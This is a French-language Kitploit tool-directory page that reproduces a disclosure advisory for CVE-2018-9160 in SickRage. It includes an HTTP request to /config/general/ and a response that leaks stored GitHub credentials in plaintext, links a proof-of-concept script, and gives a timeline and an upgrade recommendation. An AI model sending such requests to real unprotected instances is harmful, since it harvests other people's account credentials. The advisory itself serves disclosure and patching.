Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
Outils/GitHubGitHub/mechanico/sickragewtf
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

Voir le dépôt
2il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Sickrage : identifiants GitHub en clair CVE-2018-9160


  1. À propos

Exploit Title: SickRage Identifiants en clair dans la réponse HTTP
Date: 2018-04-01
Exploit Author: Sven Fassbender
Contact: https://twitter.com/mezdanak
Vendor Homepage: https://sickrage.github.io
Software Link: https://github.com/SickRage/SickRage
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Category: applications web


  1. Informations générales

"SickRage est un gestionnaire automatique de bibliothèque vidéo pour les séries TV.
Il surveille les nouveaux épisodes de vos séries préférées, et lorsqu'ils sont publiés, il fait sa magie :
recherche automatique de torrents/nzb, téléchargement et traitement selon les qualités que vous souhaitez." --extrait de https://sickrage.github.io


  1. Description de la vulnérabilité

SickRage renvoie des identifiants en clair pour, par exemple, GitHub, AniDB, Kodi, Plex etc. dans les réponses HTTP.
La condition préalable est que l'utilisateur n'ait pas défini de nom d'utilisateur et de mot de passe pour son installation SickRage. (non imposé, par défaut)

Requête HTTP :

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

Réponse HTTP :

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. Preuve de concept

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. Chronologie

[2018-03-07] Vulnérabilité découverte
[2018-03-08] Fournisseur contacté
[2018-03-08] Réponse du fournisseur
[2018-03-09] Vulnérabilité corrigée. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. Recommandation

Mettez à jour l'installation de SickRage vers la version v2018.03.09-1 ou ultérieure.
Protégez l'accès à l'application web avec des identifiants utilisateur appropriés.


Télécharger l’outil